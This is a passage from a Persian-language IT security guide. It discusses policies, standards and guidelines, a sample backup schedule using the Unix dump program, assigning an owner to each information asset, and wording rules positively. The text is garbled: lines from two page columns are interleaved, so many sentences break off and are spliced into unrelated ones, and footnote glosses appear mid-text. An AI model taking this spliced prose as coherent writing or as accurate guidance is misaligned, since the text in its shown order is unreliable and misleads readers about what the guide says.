‫ﺭﺍﻫﺒﺮﺩﻫﺎ‬ ‫ﺯﻣﺎﻥ ﺑﻪ ﺁﻫﺴﺘﮕﻲ ﺗﻐﻴﻴﺮ ﻣﻲ ﻛﻨﻨـﺪ‪ .‬ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺩﺭﺑﺮﮔﻴﺮﻧﺪﺓ ﻣﻄﺎﻟﺒﻲ ﺑﺎﺷﻨﺪ ﻣﺎﻧﻨﺪ ﺍﻳﻨﻜﻪ ﺍﺳﺘﺨﺪﺍﻣﻬﺎﻱ ﺟﺪﻳﺪ ﺑﺎﻳـﺪ‬
‫ﻻ ﺩﺭ ﺁﻧﻬـﺎ ﻓﻌـﻞ‬‫ﺭﺍﻫﺒﺮﺩﻫﺎ )ﺧﻂﻣﺸﻲﻫﺎ( ﺍﺳﻨﺎﺩﻱ ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬ ‫ﭼﮕﻮﻧﻪ ﺍﻧﺠﺎﻡ ﺷـﻮﻧﺪ‪ ،‬ﺍﺯ ﻧـﺴﺨﺔ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﺎﻳـﺪ ﺗـﺎ ﭼـﻪ ﻣـﺪﺗﻲ‬
‫"ﺑﻬﺘﺮ ﺍﺳﺖ" ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﻫﺪﻑ ﺭﺍﻫﺒﺮﺩﻫـﺎ ﺗﻔـﺴﻴﺮ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ‬ ‫ﻧﮕﻬﺪﺍﺭﻱ ﺑﻌﻤﻞ ﺁﻳﺪ‪ ،‬ﻭ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ UPS‬ﭼﮕﻮﻧﻪ ﻣـﻮﺭﺩ‬
‫ﺑﺮﺍﻱ ﻳﻚ ﻣﺤﻴﻂ ﺧﺎﺹ‪ -‬ﻳﻚ ﻣﺤﻴﻂ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻳﻚ ﻣﺤﻴﻂ‬ ‫ﺁﺯﻣﺎﻳﺶ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬
‫ﻓﻴﺰﻳﻜﻲ ‪ -‬ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺮﺧﻼﻑ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﺭﺍﻫﺒﺮﺩﻫﺎ ﺩﺭﺻـﻮﺭﺕ‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻳﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺩﺭ ﻣـﻮﺭﺩ ﻧـﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺭﺍ‬
‫ﻧﻴﺎﺯ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺍﺟﺰﺍﻱ ﺳﻴﺎﺳﺖ‪ ،‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺍﺯ ﻧﺎﻣﺸﺎﻥ‬
‫ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺁﻥ ﺍﻳﻨﮕﻮﻧﻪ ﺁﻣﺪﻩ ﺑﺎﺷﺪ‪:‬‬
‫ﻻ ﻣﺜﻞ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻛﺎﺭﺍﻳﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﭘﻴﺪﺍﺳﺖ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻧﻤﻲﮔﻴﺮﻧﺪ‪ ،‬ﺑﻠﻜﻪ ﺑﺼﻮﺭﺕ ﺭﺍﻫﻬﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﻛﻤـﻚ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺗﻤﺎﻡ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺑﺮ‬
‫ﻣﻲﻛﻨﻨﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬ ‫ﺍﺳﺎﺱ ﻳﻚ ﺑﺮﻧﺎﻣـﺔ ﻣـﻨﻈﻢ ﺯﻣـﺎﻧﻲ ﺗﻬﻴـﻪ ﺷـﻮﻧﺪ‪ .‬ﺩﺭ ﻫـﻴﭻ‬
‫ﺻﻮﺭﺗﻲ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﺒﺎﻳﺪ ﻛﻤﺘﺮ ﺍﺯ ﻳﻜﺒﺎﺭ‬
‫ﻼ ﻳﻚ ﻧﻤﻮﻧﻪ ﺭﺍﻫﺒﺮﺩ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺎﻥ ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬
‫ﺫﻳ ﹰ‬
‫ﺩﺭ ﻫﺮ ﻫﻔﺘﺎﺩ ﻭ ﺩﻭ ﺳﺎﻋﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ‪ .‬ﻫﻤﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﻳـﺪ‬
‫‪78‬‬ ‫‪Authentication Token‬‬
‫ﺣﺪﺍﻗﻞ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﺓ ﺷﺶ ﻣﺎﻫﻪ ﺣﻔﻆ ﺷﻮﻧﺪ؛ ﻭ ﺍﺯ ﺍﻭﻟﻴﻦ‬
‫‪79‬‬ ‫‪Smart Card‬‬ ‫ﭘﺸﺘﻴﺒﺎﻥ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ ﻫﺮ ﺳـﺎﻝ ﺩﺭ ﻳـﻚ ﻣﺤـﻞ‬
‫‪80‬‬ ‫‪Biometric‬‬
‫‪١٥١‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﺗﻨﻬﺎ ﻛﺎﺭﻫﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛﻪ ﻣﺎﻳﻠﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺁﻧﺮﺍ ﺍﻧﺠﺎﻡ‬ ‫ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺩﺭ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑﺮ ﻳﻮﻧﻴﻜﺲ ﺑﺎﻳﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺩﻫﻨﺪ‪ .‬ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﺍﺣﺘـﺮﺍﻡ ﺑﮕﺬﺍﺭﻳـﺪ‪.‬‬ ‫ﺍﺯ ﺑﺮﻧﺎﻣــﺔ "‪ "dump‬ﺗﻬﻴــﻪ ﺷــﻮﻧﺪ‪ .‬ﺗﻬﻴــﺔ ﭘــﺸﺘﻴﺒﺎﻥ ﺍﺯ‬
‫ﭼﻨﺎﻧﭽﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﺷﺪﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻳﺎ ﺧﻮﺩﺗـﺎﻥ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ‪ ۲۴‬ﺳﺎﻋﺖ ﺷـﺒﺎﻧﻪﺭﻭﺯ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺭﻓﻊ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺳﺮﻳﻌﹰﺎ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﻪ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ ﺑـﻪ‬ ‫ﻧﻤﻲﺷﻮﺩ ﺑﺎﻳﺪ ﺩﺭ ﻃﻮﻝ ﺷﺐ ﻭ ﺩﺭ ﺣﺎﻟﺖ ﺗﻚﻛـﺎﺭﺑﺮﻩ ﺍﻧﺠـﺎﻡ‬
‫ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻢ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻳﺪ‪ .‬ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ‬ ‫ﺷﻮﺩ‪ .‬ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ‪ ۲۴‬ﺳﺎﻋﺘﻪ ﺩﺭﺣـﺎﻝ‬
‫ﺑﭙﺬﻳﺮﻳﺪ ﻭ ﻫﻤﻴﺸﻪ ﺧﻮﺩ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻛﻨﻴـﺪ‪ .‬ﺍﺯ ﻛﺎﺭﺗـﺎﻥ ﻟـﺬﺕ‬ ‫ﻓﻌﺎﻟﻴﺖ ﻫﺴﺘﻨﺪ ﺑﺎﻳـﺪ ﺩﺭ ﺯﻣـﺎﻥ ﻧﺰﺩﻳﻜﺘـﺮﻳﻦ ﺗﻐﻴﻴـﺮ ﺷـﻴﻔﺖ‬
‫ﺑﺒﺮﻳﺪ‪.‬‬ ‫ﻛﺎﺭﻱ ﺑﻪ ﻧﻴﻤﻪﺷﺐ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ )ﺯﻣﺎﻧﻲ ﻛﻪ ﺑﺎﺭ ﻛﺎﺭﻱ ﺳﻴـﺴﺘﻢ‬
‫ﺍﺯ ﻫﻤﻴﺸﻪ ﻛﻤﺘﺮ ﺍﺳﺖ(‪ .‬ﺗﻤﺎﻡ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺑﻼﻓﺎﺻـﻠﻪ‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻻﺯﻡ ﺍﺳﺖ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲﺗﺮ ﻛـﻪ ﺗﻮﺳـﻂ‬
‫ﭘﺲ ﺍﺯ ﻧﻮﺷﺘﻪ ﺷﺪﻥ ﺑﺎﻳﺪ ﻣﺠﺪﺩﹰﺍ ﺧﻮﺍﻧﺪﻩ ﺷـﻮﻧﺪ ﺗـﺎ ﺻـﺤﺖ‬
‫ﻳﻚ ﻣﺘﺨﺼﺺ ﺭﺳﻤﻲ ﻭ ﭼﻨﺪ ﻣﺸﺎﻭﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺷـﺪﻩ ﺭﺍ‬
‫ﺍﻃﻼﻋﺎﺕ ﻧﻮﺷﺘﻪﺷﺪﻩ ﺑﻪ ﺗﺄﻳﻴﺪ ﺑﺮﺳﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎﻳﺘﺎﻥ ﺑﻜﺎﺭ ﺑﺮﻳﺪ‪ .‬ﺳﻴﺎﺳﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑـﺎ‬
‫ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ ﺑـﺮﺍﻱ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ‬ ‫ﺩﺭ ﺍﻭﻟﻴﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻣﺎﻫﻬﺎﻱ ﮊﺍﻧﻮﻳﻪ ﻭ ﮊﻭﺋﻦ‪ ،‬ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﻣﻼﺣﻈﺎﺕ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻻﺯﻡ ﺍﺳـﺖ ﺑﻄـﻮﺭ ﻣﺠـﺰﺍ ﺩﺭ‬ ‫ﺳﻄﺢ ﺻﻔﺮ‪ ٨١‬ﺗﻬﻴﻪ ﻣﻲﺷﻮﺩ‪ .‬ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺳـﻄﺢ ‪ ۳‬ﺑﺎﻳـﺪ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬ ‫ﺩﺭ ﺍﻭﻝ ﻭ ﭘﺎﻧﺰﺩﻫﻢ ﻫﺮ ﻣﺎﻩ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ‪ .‬ﭘـﺸﺘﻴﺒﺎﻥ ﮔﻴـﺮﻱ‬
‫ﺳﻄﺢ ‪ ۵‬ﺑﺎﻳﺪ ﺷﺒﻬﺎﻱ ﻫﺮ ﺩﻭﺷﻨﺒﻪ ﻭ ﭘﻨﺞﺷﻨﺒﻪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ‪،‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬

‫ﺗﺨﺼﻴﺺ ﻳﻚ ﻣﺴﺌﻮﻝ‬ ‫ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﺸﺘﻴﺎﻥ ﺳﻄﺢ ﺻﻔﺮ ﻳﺎ ‪ ۳‬ﺩﺭ ﻫﻤﺎﻧﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‬
‫ﻫﺮ ﺟﺰﺀ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ‬ ‫ﺑﺎﺷﺪ‪ .‬ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ‪ ۷‬ﺑﺎﻳﺪ ﻳﻚ ﺷﺐ ﺩﺭ ﻣﻴﺎﻥ ﺗﻬﻴﻪ ﺷﻮﺩ‪،‬‬
‫ﮔﻴﺮﺩ ﺑﺎﻳﺪ ﻳﻚ ﻣﺴﺌﻮﻝ ﻣﻌﻴﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪" .‬ﻣﺴﺌﻮﻝ" ﻛﺴﻲ ﺍﺳﺖ‬ ‫ﻣﮕﺮ ﺩﺭ ﺍﻳﺎﻡ ﺗﻌﻄﻴﻼﺕ‪.‬‬
‫ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ‪ ،‬ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ‪ ،‬ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻭ ﺳﺎﻳﺮ‬
‫ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﺩﺭ ﻫﺮ ﻫﻔﺘﻪ ﻳﻚ ﻓﺎﻳﻞ ﺭﺍ ﺑﺼﻮﺭﺕ ﺗـﺼﺎﺩﻓﻲ‬
‫ﺟﻨﺒﻪﻫﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﺩ‪ .‬ﺍﻭ ﻫﻤﭽﻨـﻴﻦ‬
‫ﺍﺯ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻪ ﺩﺭ ﻫﻤﺎﻥ ﻫﻔﺘـﻪ ﺗﻬﻴـﻪ ﺷـﺪﻩ ﺍﻧﺘﺨـﺎﺏ‬
‫ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺍﺳـﺖ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ‬
‫ﻣﻲﻛﻨﺪ ﺗﺎ ﻛﺎﺭﻣﻨـﺪ ﺑﺨـﺶ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ ﺑـﺮﺍﻱ ﻛـﺴﺐ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻋﻤﻠﻜﺮﺩ ﺻﺤﻴﺢ ﺭﻭﺍﻟﻬﺎﻱ ﺗﻬﻴﺔ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ‪،‬‬
‫ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺁﻥ ﻓﺎﻳﻞ ﺭﺍ ﺍﺯ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﺎﺯﻳﺎﺑﻲ ﻛﻨﺪ‪.‬‬
‫ﻣﻬﻤــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻣــﺴﺌﻮﻝ ﻣﺸﺨــﺼﻲ ﻧــﺪﺍﺭﺩ‪ .‬ﺩﺭﻧﺘﻴﺠــﻪ‬
‫ﺭﺍﻫﺒﺮﺩﻫﺎ ﺑﺮﺍﻱ ﻣﻌﻤﺎﺭﻳﻬﺎﻱ ﺧﺎﺹ ﻭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﻭﻳـﮋﻩ ﺗﻬﻴـﻪ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺩﺍﻧﻨﺪ ﭼﻪ ﻛـﺴﻲ ﺩﺭﺑـﺎﺭﺓ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻲ ﺷﻮﻧﺪ؛ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮﻱ ﺗﻐﻴﻴﺮ‬
‫ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﭼﻪ ﻛﺴﻲ ﺿﻮﺍﺑﻂ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬
‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺷﺮﺍﻳﻂ ﻣﺘﻐﻴﺮ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺻـﺤﻴﺢ ﻣـﻨﻌﻜﺲ‬
‫ﺗﺪﻭﻳﻦ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ )ﻭ ﻫﻤﭽﻨـﻴﻦ ﺗﺠﻬﻴـﺰﺍﺕ(‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﻣﺘﻮﺟﻪ ﺷـﻮﺩ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﻃـﻮﻻﻧﻲ ﻧﺎﭘﺪﻳـﺪ‬
‫ﻣﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺁﻧﻬﺎ ﻧﻴﺴﺖ ﻛﻪ ﺷﺮﺍﻳﻂ ﺭﺍ ﻛﻨﺘﺮﻝ‬
‫ﻧﻜﺎﺕ ﻛﻠﻴﺪﻱ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺁ‬
‫ﻛﻨﺪ‪.‬‬
‫ﻧﻘـﺶ ﺳﻴﺎﺳــﺖ )ﻭ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ( ﻛﻤــﻚ ﺑــﻪ‬
‫ﻣﺜﺒﺖ ﺑﺎﺷﻴﺪ‬ ‫ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺭﻭﻳﻬﻤﺮﻓﺘﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺗﻠﻘـﻲ‬
‫ﺍﻓﺮﺍﺩ ﺑﻪ ﺟﻤـﻼﺕ ﻣﺜﺒـﺖ ﻭ ﺍﺛﺒـﺎﺗﻲ ﺑﻬﺘـﺮ ﺍﺯ ﺟﻤـﻼﺕ ﻣﻨﻔـﻲ ﻭ‬ ‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺳﻴﺎﺳﺘﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‬
‫ﻋﺒﺎﺭﺍﺕ ﻧﻔـﻲﻛﻨﻨـﺪﻩ ﻭﺍﻛـﻨﺶ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫﻨـﺪ‪ .‬ﺑﺠـﺎﻱ ﺗﻬﻴـﻪ‬ ‫ﻭﻳﮋﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﻟﻴﺴﺘﻬﺎﻱ ﻃﻮﻳﻞ ﺍﺯ ﻋﺒﺎﺭﺗﻬﺎﻱ "ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﻴﺪ"‪ ،‬ﺑﺒﻴﻨﻴﺪ ﻛﻪ‬ ‫ﺳﻴﺎﺳﺖ ﻣﺤﻴﻂ ﺷﻤﺎ ﻛﺎﻓﻲ ﺍﺳﺖ‪ ،‬ﻣﺎﻧﻨﺪ ﻣﺜﺎﻝ ﺯﻳﺮ‪:‬‬
‫ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﺎﻥ ﺿﻮﺍﺑﻂ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺜﺒـﺖ ﺟﻤﻠـﻪﺑﻨـﺪﻱ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻭﻇﻴﻔﺔ ﻫﻤـﻪ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺳﻴﺎﺳﺖ ﺧﻼﺻﺔ ﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣﺠﻤﻮﻋـﻪﺍﻱ‬
‫ﺍﺯ "ﻧﺒﺎﻳﺪﻫـﺎ" ﻣﻄـﺎﺑﻖ ﺯﻳـﺮ ﺗﻬﻴـﻪ ﻛـﺮﺩ؛ ﺍﻣـﺎ ﺑﺒﻴﻨﻴـﺪ ﻛـﻪ ﻫﻤـﺎﻥ‬
‫‪81‬‬ ‫‪Level 0 dump‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٥٢‬‬

‫ﻫﻤــﻮﺍﺭﻩ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧــﻮ‪ ،‬ﺗﻬﺪﻳــﺪﺍﺕ ﺟﺪﻳــﺪ‪ ،‬ﺭﻭﺷــﻬﺎﻱ ﻧــﻮﻳﻦ‪ ،‬ﻭ‬ ‫ﻋﺒﺎﺭﺗﻬﺎﻱ ﻗﺒﻠﻲ ﭼﻘﺪﺭ ﺭﺍﺣﺖﺗﺮ ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﺪﻧﺪ‪:‬‬
‫ﺍﻃﻼﻋــﺎﺕ ﺗــﺎﺯﻩ ﺑــﺮﺍﻱ ﻳــﺎﺩﮔﻴﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﮔــﺮ ﻛﺎﺭﻣﻨــﺪﺍﻥ‬ ‫ﺍﻳﻦ ﻭﻇﻴﻔﺔ ﺷﻤﺎﺳﺖ ﻛﻪ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﻫﻔﺘﻪﺍﻱ ‪ ۶۰‬ﺳﺎﻋﺖ ﺻﺮﻑ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻴﺎﻟﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ‬ ‫ﻧﺎﺩﺭﺳﺖ ﺑﺸﻮﺩ‪ .‬ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﻭﺳﺖ ﻧﺪﺍﺭﻳﺪ ﺩﻳﮕﺮﺍﻥ ﺍﻧﺠـﺎﻡ‬
‫ﺷﺨﺼﻲ ﻭ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺎﺯﻫﻢ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬ ‫ﺩﻫﻨــﺪ ﺭﺍ ﺍﻧﺠــﺎﻡ ﻧﺪﻫﻴــﺪ‪ .‬ﺣــﺮﻳﻢ ﺧــﺼﻮﺻﻲ ﺩﻳﮕــﺮﺍﻥ ﺭﺍ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺳﺎﻻﻧﻪ ﺗﻨﻬﺎ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﻫﻔﺘـﻪ ﺗﺤـﺖ ﺁﻣـﻮﺯﺵ‬ ‫ﺧﺪﺷﻪﺩﺍﺭ ﻧﻜﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﻭ ﻧﺘﻮﺍﻧـﺴﺘﻴﺪ ﺁﻧـﺮﺍ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻛﺎﺭﺁﻳﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﺑﻪ ﺁﻧﻬﺎ ﻓﺮﺻﺖ‬
‫ﺑﺮﻃﺮﻑ ﻛﻨﻴﺪ‪ ،‬ﻣﺸﻜﻞ ﺭﺍ ﻣﺨﻔﻲ ﻧﮕﻪ ﻧﺪﺍﺭﻳﺪ‪ .‬ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ‬
‫ﺗﺮﻗﻲ ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻃﻮﻝ ﻣﺪﺕ ﻛﺎﺭ ﺩﺍﺩﻩ ﺷﻮﺩ ﻭ ﺍﺟـﺎﺯﻩ ﺩﺍﺷـﺘﻪ‬
‫ﺑــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺭﺍ ﻧﻘــﺾ ﻧﻨﻤﺎﻳﻴــﺪ‪ .‬ﺳــﻌﻲ ﻧﻜﻨﻴــﺪ‬
